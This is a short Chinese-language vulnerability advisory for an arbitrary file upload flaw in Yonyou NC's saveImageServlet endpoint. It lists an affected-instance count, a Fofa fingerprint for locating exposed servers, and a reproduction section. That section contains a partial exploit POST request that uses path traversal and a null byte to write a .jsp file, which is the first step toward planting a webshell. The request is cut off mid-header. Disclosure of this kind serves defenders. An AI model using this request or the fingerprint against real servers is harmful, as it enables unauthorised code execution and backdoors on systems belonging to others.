简介
UClient 提供全新客户端,消除浏览器依赖,完成用户与企业应用的链接优化,并支持企业应用在终端上的自动升级。
漏洞描述
用友 NC系统/servlet/saveImageServlet/接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
影响版本与影响数量
影响版本:用友NC
影响数量:4663
Fofa:icon_hash=”1085941792”
漏洞编号与披露时间
漏洞编号:暂无
披露时间:2024-04-11
漏洞复现
POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../1.jsp%00 HTTP/1.1
Host:
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windo